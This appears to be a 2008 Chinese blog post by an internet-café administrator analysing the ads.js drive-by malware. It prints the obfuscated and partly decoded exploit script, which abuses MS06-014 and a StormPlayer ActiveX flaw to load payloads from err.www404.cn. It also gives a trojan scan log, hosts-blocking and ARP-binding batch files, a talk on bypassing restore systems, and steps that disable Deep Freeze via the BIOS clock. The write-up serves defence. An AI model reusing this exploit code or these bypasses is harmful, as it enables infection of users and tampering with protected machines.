ads.js新变种(err.www404.cn:53/ads.js)?又是百度

这个地址是在telnet百度的时候发现的:

<script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script>

把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。

ads.js源码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]”;h{2 e;2 w=(4[“P”+”U”](“x”));w[“X”](“W”,v);f[“E”][“D”](“C”+”F.”+”S”+”M”+”e”+”K”,””)}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f[“l”](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f[“l”](“1g”+”16.17″+”15.1”);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f[“l”](“12″+”13.I”+”18.1”);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{}))

ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么):

function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function exit(){var Cikeid1=”clsid:BD9″+”6C556″+”-65A3-11D”;var Cikeid2=”0-983A”+”-00C04FC29E36″;var Cikeid=Cikeid1+Cikeid2;var errinfo=”[object Error]”;try{var e;var afilesto=(document[“creat”+”eElement”](“object”));afilesto[“setAttribute”](“classid”,Cikeid);window[“ado”][“createobject”](“Ad”+”odb.”+”S”+”tr”+”e”+”am”,””)}catch(e){};finally{var hoodt=new Date();hoodt.setTime(hoodt.getTime()+86400000);document.cookie=’MyCookie=lonely;path=/;hoodt=’+hoodt.toGMTString();document.write(“”);document.write(” “);if(e!=errinfo){}else{try{var cikewm=new window[“ActiveXObject”](“MPS.StormPlayer”);var sto}catch(sto){};finally{if(sto!=errinfo){document.write(” “);

这里的clsid为:clsid:BD96C556-65A3-11D0-983A-00C04FC29E36可以知道是利用的ms06014漏洞来挂的。

最下边还有stormPlayer是利用暴风影音漏洞来的。

临时解决办法(比如不让卡吧弹出提示什么的,因为怎么杀也杀不完,是别人机子中毒啦,DnsArp影响到你):

保存下面为a.bat然后双击运行就可以啦

echo 127.0.0.1       u.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       g.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       u.asdafdgfgf.com/ads.js  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1        222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com/ads/ads.cab  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn:53/ads.js >>C:\WINDOWS\system32\drivers\etc\hosts

或者直接把这个222.216.28.25在路由器中过滤掉(ps:如果他是个人的adsl就过滤掉他一个网段吧),为啦不影响使用我过滤的他单个ip,还有开启360恶意网页拦截也能达到保护的效果。

u.asdafdgfgf.com不完全查杀记录『Fax 2Client为你带来的礼物』

好不容易抓到个中奖的机子(其他机子都打补丁啦,就有两个没打过补丁!!后来挪进来的机子)

360安全卫士木马查杀历史报告

木马名称:恶意干扰对象
路径:C:\WINDOWS\DOWNLO~1\405.exe
查杀时间 :2008-04-21 20:17
木马名称:伪Honey木马下载器
路径:C:\PROGRA~1\COMMON~1\CPUSH\cpush.dll
查杀时间 :2008-04-21 20:17
木马名称:Weiyuan木马程序
路径:C:\windows\system32\weiyuan.exe
查杀时间 :2008-04-21 20:17
木马名称:PWL.LMir木马程序
路径:C:\WINDOWS\system32\inf\svch0st.exe
查杀时间 :2008-04-21 20:17
木马名称:伪linkinfo恶意程序
路径:C:\WINDOWS\linkinfo.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sua
路径:C:\Program Files\Common Files\CPUSH\Uninst.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\桌面\Microsoft.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\m[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\dat[1].asp
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\4B6LWHOV\1[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\Documents and Settings\Admin\Local Settings\Temp\wip.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aha
路径:C:\Documents and Settings\Admin\Local Settings\Temp\223.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\6D2RAZC7\ThunderBHONew32[1].dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\an006[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\d39[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\cec61.txt
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\cce1.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\WINDOWS\an006.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\WINDOWS\d39.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Small.hlp[Downloader]
路径:C:\WINDOWS\AppPatch\AcSpecf.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\WINDOWS\AppPatch\AcPlugin.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system\zayjhxpRes080419.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\WINDOWS\system32\catclogd.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.HZJ.aba
路径:C:\WINDOWS\system32\dyylns80.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lae
路径:C:\WINDOWS\system32\wicheck080411.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\inf\scrsyszy080419.scr
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\1.ext
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.FtpSend.a[SPY]
路径:C:\WINDOWS\system32\drivers\eth8023.sys
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\05801.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sab
路径:c:\WINDOWS\inf\dev01.inf
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oac
路径:C:\WINDOWS\system32\wicheck080411.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\system32\4051.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\WINDOWS\ThunderBHONew32.dll
查杀时间 :2008-04-21 20:17

很好很全啊,查看过ie记录只有u.asdafdgfgf.com/web/index.htm最可疑,

很猖獗啊,下的木马病毒都还在桌面上放着!

其中一个vb脚本(Chenzi.vbs):

Set Shell = CreateObject(”Wscript.Shell”)
Shell.Run (”Chenzi.exe”)
Set Shell = Nothing

这个是查杀记录,木马很全啊,机器狗哈哈,他还不知道他的狗在这个机子上不管用呢

只是发现这个机子有问题就去看看的,估计是被dns欺骗的时候中招的,那个木马制造者也太猖狂啦竟然把木马赫赫的摆在桌面上!恐怕我不知道机子中呢?脑残?

这个之所以叫做不完全查杀记录是因为我只是看看病毒是怎么进来的,还有病毒都构成哪些危害,并不确定360在机子重启后就把病毒清除干净。

重启后我自然是打开还原打上补丁重新做过备份开启360自我保护加全保护了以防万一嘛。

看到技术文章很稀奇——奇虎郑文彬:还原系统保护技术原理和攻防

说啦半天他就是来推销GuardField(360还原保护器)的,还原系统保护的原理讲的很通俗易懂,要是在来点代码或者调试分析就更好了(ps:这样的话恐怕来参加峰会的听众有部分要睡觉啦@_@),机器狗去年9月开始通杀软硬件还原系统,现在终于澄清啦“硬件还原卡的好处是:可以更早的监视。防止类似dos破坏还原系统的情况”。看来我上次(去年的事啦)被别人忽悠啦(那个给网吧做系统的说刻盘最好先把还原精灵卸掉,现在看来完全没必要这步操作,因为没有使用硬件pci还原卡啊!!)

奇虎郑文彬:还原系统保护技术原理和攻防

来自奇虎的反木马专家郑文彬,在现场发表演讲。以下为文字实录:

郑文彬:大家好!我今天给大家介绍这几个方面:背景、还原系统技术原理概览、流行还原系统穿透技术介绍、通用还原系统保护技术、演示&GuardField、还原系统保护之未来趋势。最近一段时间,有机器狗这类病毒工具对还原系统攻击,使用还原系统环境的用户一般都不会安装其他的防护软件,一旦还原软件被穿透的话,会带来比较大的安全威胁。

还原系统技术原理:基本原理是磁盘设备过滤驱动。比较常用方法是自己会建一个磁盘卷设备,在harddiskX进行文件过滤。过滤驱动如何做到还原?首先还原系统会在磁盘上分配一块预留的区域,应用程序以为他已经写到真实磁盘,实际上被分配到一块内容区域里,真实磁盘根本就没有被写入。

下面介绍一下还原软件怎么更新过滤。首先是一个普通的Windows程序,会调用 Win32API,从用户模式到内存模式,这些函数调用Windows内核,把文件请求发到文件系统上,根据磁盘卷分区格式不同来创建。文件系统设备会将上层发来的文件读写请求转化磁盘读写请求,在harddisk volume之前会有还原系统过滤驱动。再往下会根据硬盘接口不同而有不同。如果IDE结构硬盘,会发布到电源系统。api最终会调用函数读写端口。如果是USB设备,会发送到usb stor。

刚才说了还原系统的一些基本原理,知道原理之后对如何穿透还原也就很简单了。既然还原系统都在磁盘上过滤驱动,只要我们解除过滤驱动与真实磁盘之间的关系,绕过过滤关系的话,就等于直接穿透了还原。第一种方法:DR0设备过滤设备链摘链。这种方法其实就是摘除一个harddiskDR0上的过滤设备。指明设备上会有哪些过滤设备,第一代机器狗病毒将这个域给清零,导致还原系统设备被清除,所有请求就不通过还原系统直接到达过滤磁盘设备。对于没有防备的还原系统就被成功攻破了。国内大部分还原系统都没有办法对抗这种技术。但是这种技术也是有一些缺陷的,只能摘除在DR0上的物理设备。文件请求先到达磁盘卷,磁盘卷上的过滤设备摘除的话对系统有影响。所以第一代机器狗病毒使用了自己解析文件系统方式进行感染,这是它的缺陷。

第二种方法:会自己创建虚拟磁盘设备,作为磁盘卷挂载到文件系统上,对虚拟磁盘读写影射到真实磁盘,将请求下发到下层设备。相对第一代机器狗来说,这种方法不需要对磁盘系统摘除,可以通过文件对虚拟磁盘操作,操作结果是和对真实磁盘操作是一样的,可以成功穿透还原。在这里还用一种方式就是他没有直接发送磁盘读写请求,发送SCSI-REQUEST-BLOCK下发到下层磁盘设备。

还有一种方法,这是方法不使用驱动程序,直接在用户模式穿透还原系统。磁盘系统提供一套 passthrough指令,不向磁盘发送直接请求,就可以获取磁盘信息甚至直接读写磁盘扇区。IDE/SCSI/ATA Pass Through指令穿透还原,RING3下使用Devicelocontrel函数发送请求。大多数还原系统对此过滤不严或根本未过滤,导致在RING3 下即可达成攻击。

其他一些方法,比如说直接操作端口驱动,比如USB,更底层的磁盘操作:端口驱动、直接IO 等等,缺点是难度大,通用较麻烦。另外的方法是可以摘除其他一些过滤设备,Attach到还原系统上,先于磁盘系统获得磁盘的请求,可以做一个绕过动作。可以在磁盘卷设备保存指针上所手脚。方法很多,不再一一解释了。主要是两类,第一类是新的磁盘技术或者磁盘卷绕过或者穿透的一些技巧。

通用还原系统的保护技术,GuardField。还原系统脆弱的原因是什么呢?刚才也说过了他是通过磁盘设备上的过滤驱动,也就是说他跟磁盘设备没有紧密联系,只要被攻击者使用、摘除或者绕过方法就可以把磁盘请求发送到真实磁盘上。穿透基本原理:必须使读写请求不经过还原系统物理驱动,而是到了下层的物理磁盘设备。这里就有一个穿透思路,一个磁盘请求是从上层逐层发布到下层,我们只要监控发送路径,进行对比操作,就可以作为一个还原穿透的角色。

这是我们上周发布的360GuardField文件,给大家演示一下效果。这是一台XP虚拟机,安装了冰点的还原系统,这个还原系统正常会被第一代机器狗穿透。这是我们第一代机器(图)。这个系统已经安装了还原保护。可以看到还原攻击已经被拦截了,这个时候看到攻击者已经没有了。然后使用微软工具查看一下,可以看到攻击者攻击是失败的。这是第二代机器狗样本,它可以直接对文件操作,不需要感染。他可以在启动目录上拷贝一个文件,因为他是穿透还原去拷贝文件,所以重启后就无法被还原了。这里会有第三种攻击方法,passthrouh,它可以破坏磁盘数据。我们用Winhex看一下。攻击演示就做到这里。可以看到我们在对待第一、二、三代攻击都成功做到保护。

现在说一下GuardField原理,首先在启动时手机、挂钩还原系统的磁盘过滤驱动,监视磁盘IRP发送。之后我们挂钩底层磁盘设备,监视磁盘IRP达到,如果数据结构里没有磁盘IRP,我们就认为磁盘IRP没有经过还原系统到达下层。我们首先对系统做一个检查、修复,检查之前保存的磁盘过滤设备链有没有被摘除,如果摘除了,我们恢复。然后会将这个信息发送到Ring3服务进程。我刚才说的第一种攻击手段,它以后读写都不会再成功了。后面请求的时候都会被还原系统拦截到。第二代虚拟磁盘方式,每次读写都穿透还原,所以每次穿透还原都会拦截掉。

我们挂钩还原系统在磁盘卷上的过滤驱动,进行收集IRP操作,下面还原系统在磁盘上的过滤驱动,然后在磁盘设备下层也会挂钩,GuardField分析IRP。

IRP监视回收,他不一定会发送到下层。可能在磁盘卷或者过滤设备上被取消或者直接完成掉,没有往下传送。数据始终保持在数据结构里没有被清除。Lofreelrp是用于IRP取消或者完成来释放的。他jmp ds_Plofreelrp。每次当IRP回收的时候,我们从数据结构里可以得到一个监视。

对抗passthrough,因为我们挂钩下层磁盘设备,TM都会使用passthrough这些指令,他是通过这些指令获取磁盘信息。分析passthrough请求包意图。拦截恶意攻击者的passthrough指令。

同时还结合传统反病毒技术,为什么还会使用传统反病毒技术呢?主要原因是Ringo攻击者同我们处在同一水平,除非阻止其进入RING0,不可能完全对其进行防御。GuardField使用方法,通过Mmloadsystemlmage函数。如果是一个已知的驱动的话,我们会阻止,最大可能乐观防止攻击者攻击。

还原系统未来趋势。我们现在有GuardField的保护,恶意攻击者肯定会开发出一些新的更新,对抗GuardField。他们可能会使用哪些手段,猜测主要有两方面:第一,更底层或者更新的磁盘读写技术,绕过磁盘IRP分析,直接写入磁盘。第二,针对GuardField本身的工具,对GuardField进行破坏、脱钩。我们发布之后,大概不到两天时间就有新的驱动出来,对我们 GuardField脱钩。

如何防御:更底层的磁盘读写监视。他们开发起来难度比较大,短期内没有办法形成比较大的规模。GuardField这套系统如果有一定时间可以进行修改的话,还是可以用现有系统兼容,对磁盘底盘操作进行监视。我们知道atapi.sys IRP还是存在的,对这一层做hook。

针对第二种方法脱钩,可以适量的自我保护、恢复。就我个人来看,针对性攻击不足为惧。如果攻击者对防御者产生一些针对性攻击,等于攻击者容易落入一个被动捱打的局面。如果已经到脱钩了,说明攻击者已经比较穷了。还原系统在软件方面的对抗应该是没有止境的。有什么问题大家可以问。

以下是现场问答部分:

问:我给郑文彬补充一些数据,根据权威部门统计,盗号70%是来自网吧。而网吧几乎100%安装了还原设备。刚才郑文彬也介绍了还原设备的攻防。其实还原系统是很重要的一块。

问:我想请问一下您刚才介绍的还原系统软件原理、实现方法,能不能介绍还原卡硬件的原理?

郑文彬:对于还原卡来说,一般有两种。现在市面上的还原卡都不是真正的硬件上的还原卡,他们使用技术就是PCI设备,可以在OS启动之前获得控制权,在OS无整个过程中监控磁盘读写,但是实质上是通过磁盘驱动监视。应该国外有一些硬盘磁盘设备监控磁盘IO端口,在IDE接口上做一些保护。但是这种硬件还原产品至今我没有看到。主要还是采用软件方面保护。

问:你的意思是你看到还原卡本质还是软件还原设备?

郑文彬:用PCI就可以比磁盘的OS启动的更早。

问:那就是说PCI还原卡是忽悠人的?

郑文彬:它的好处就是可以更早的监视。像一些纯软件的还原卡,如果在DOS下攻击的话,应该是没有办法的。

主持人:感谢文彬给我们带来的精彩演讲。下面还是茶歇时间。

原文地址:http://tech.qq.com/a/20080320/000261.htm

看到技术文章很稀奇(ps:尤其是以前不知道的“牛公司”的“不知名”的“牛人”的)

刚刚在cb(就是那个投递新闻要填原文地址,显示却没有原文地址的地方。ps)看到“奇虎郑文彬:还原系统保护技术原理和攻防”,以前查机器狗的时候也看过还原的原理和磁盘设备栈(文件系统设备堆栈)的相关技术分析文章,不过这个看起来更通俗易懂(毕竟是演讲嘛,ps:很想看看演讲稿或者视频录像,还有专家的个人blog地址!!)。

就是这次18日在深圳开的“腾讯网络安全技术峰会”。

继续看ing,打算看一篇觉得有用就引用一片到这里来!!

脆弱的冰点还原『告诉你一个天大的秘密』

告诉你一个秘密:天大的一个秘密,没有机器狗,冰点依然很脆弱。

破解冰点步骤:

冰点正常启用状态 ——重启——按del进入bios设置(我想大多网吧应该都没有设置密码吧!!)——进入Standard CMOS Features——修改下时间——可以随便改,我是修改的月,单独修改年也有效果。。——按F10保存设置重启——进入桌面你看到什么啦!!

没错红色的叉叉:

bios解除冰点还原

冰点版本:

deep freeze6

偶就这个版本,偶然发现的这个破解冰点还原的办法。

发现过程:

偶发现系统时间不对是2003年的,由于偶曾设置过修改系统时间的用户权限,也不想去改回来在修改,想在bios里设置吧,应该可以,结果就是发现啦时间改好后进入系统发现本来启用的冰点变成禁用状态(不起还原作用)啦。

这个仅仅拿出来学习ing,谢绝破坏和谐社会,谢谢,更不要来偶管理的网×搞。

解决办法:

1:设置bios密码。。

2:使用正式版的冰点还原(deepfreeze),像这样的截图(仔细观察下截图有哪些不同,不懂得英文查字典哈)@_@

deepfreeze

若你有啥想法直接在评论里说哈,欢迎ing

arp欺骗和机器狗病毒简单免疫批处理脚本(bat)

wmic process where name=”userinit.exe” call terminate
wmic process where name=”usrinit.exe” call terminate
@echo OFF
if %~n0==arp exit
if %~n0==Arp exit
if %~n0==ARP exit
echo 正在获取本机信息…..arp -d
:IP
FOR /f “skip=13 tokens=15 usebackq ” %%i in (`ipconfig /all`) do Set IP=%%i && GOTO MAC
:MAC
echo IP:%IP%
FOR /f “skip=13 tokens=12 usebackq ” %%i in (`ipconfig /all`) do Set MAC=%%i && GOTO GateIP
:GateIP
echo MAC:%MAC%
arp -s %IP% %MAC%
arp -s 192.168.1.1 00-0e-a0-00-8e-83
arp -s 192.168.1.120 00-e0-4c-fa-0c-37
echo IP绑定操作完成!!!
start \\zsdn\run\run.exe
@ title 欢迎光临http://clin003.com/
@ color f0